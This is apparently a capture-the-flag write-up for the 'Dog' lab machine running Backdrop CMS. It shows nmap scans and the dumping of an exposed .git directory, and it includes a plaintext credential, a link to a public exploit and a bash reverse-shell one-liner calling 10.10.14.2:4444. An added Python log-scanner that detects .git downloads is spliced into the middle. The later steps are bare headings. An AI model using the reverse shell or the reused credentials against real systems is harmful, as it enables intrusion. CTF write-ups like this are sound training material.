Dog

Operating system: Linux
Difficulty: Easy
Release date: 08 March 2025
Creator: FisMatHack

Port scan

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.11.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-25 17:25 -03
Initiating SYN Stealth Scan at 17:25
Scanning 10.10.11.58 [65535 ports]
Discovered open port 80/tcp on 10.10.11.58
Discovered open port 22/tcp on 10.10.11.58
Completed SYN Stealth Scan at 17:25, 20.20s elapsed (65535 total ports)
Nmap scan report for 10.10.11.58
Host is up, received user-set (0.24s latency).
Scanned at 2025-05-25 17:25:13 -03 for 20s
Not shown: 60942 closed tcp ports (reset), 4591 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 20.30 seconds
           Raw packets sent: 97708 (4.299MB) | Rcvd: 61583 (2.463MB)

Version and service enumeration

nmap -sCV -p22,80 -oN servicesScan 10.10.11.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-25 17:25 -03
Nmap scan report for 10.10.11.58 (10.10.11.58)
Host is up (0.24s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-title: Home | Dog
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.10 seconds

Initial exploitation

HTTP (80)

Backdrop CMS is an open-source, community-developed content management system written in PHP and licensed under the GNU General Public License.


python3 git_dumper.py http://10.10.11.58:80/.git/ dog_htb
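
A defensive counterpart to the exposed /.git/ directory reported by http-git and downloaded above, as an added example that is not part of the original writeup: it scans Apache access-log lines for clients that were actually served files under /.git/. The log lines, the IP addresses and the min_served threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample in Apache "combined" log format (not taken from the page).
SAMPLE_LOG = """\
192.0.2.10 - - [25/May/2025:17:31:02 -0300] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "python-requests/2.31.0"
192.0.2.10 - - [25/May/2025:17:31:02 -0300] "GET /.git/config HTTP/1.1" 200 92 "-" "python-requests/2.31.0"
192.0.2.10 - - [25/May/2025:17:31:03 -0300] "GET /%2egit/description HTTP/1.1" 200 73 "-" "python-requests/2.31.0"
192.0.2.10 - - [25/May/2025:17:31:03 -0300] "GET /.git/index HTTP/1.1" 200 344667 "-" "python-requests/2.31.0"
192.0.2.10 - - [25/May/2025:17:31:04 -0300] "GET /.git/objects/00/00000000000000000000000000000000000000 HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
192.0.2.77 - - [25/May/2025:17:40:10 -0300] "GET /.git/HEAD HTTP/1.1" 403 199 "-" "Mozilla/5.0"
192.0.2.99 - - [25/May/2025:17:41:55 -0300] "GET /?q=user/login HTTP/1.1" 200 4310 "-" "Mozilla/5.0"
"""

# client, ident, user, [timestamp], "METHOD path protocol", status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3})\b'
)
# Matches /.git and anything below it, tolerating repeated leading slashes.
GIT_RE = re.compile(r"^/+\.git(/|$)", re.IGNORECASE)


def git_exposure(log_text, min_served=3):
    """Return {client_ip: sorted paths} for clients that received a 2xx response
    for at least min_served distinct files under /.git/, which separates an
    actual repository download from a single blocked or failed probe."""
    served = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        # Drop the query string and decode %2e-style encoding before matching.
        path = unquote(m["path"].split("?", 1)[0])
        if GIT_RE.match(path) and m["status"].startswith("2"):
            served[m["ip"]].add(path)
    return {ip: sorted(paths) for ip, paths in served.items() if len(paths) >= min_served}


if __name__ == "__main__":
    for ip, paths in git_exposure(SAMPLE_LOG).items():
        print(f"{ip} was served {len(paths)} files under /.git/: {paths[:3]} ...")
```

Any 2xx response under /.git/ means the repository metadata is reachable from the web; the fix is to keep .git out of the document root or deny access to it in the Apache configuration.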


tiffany@dog.htb:BackDropJ2024DS2024


https://www.exploit-db.com/exploits/52021

A tar archive must be generated, not a zip.


We launch a reverse shell.

bash -c "bash -i >& /dev/tcp/10.10.14.2/4444 0>&1"


Reuse of tiffany's password.


We read the user flag.


Privilege escalation


PoC


We read the root flag.
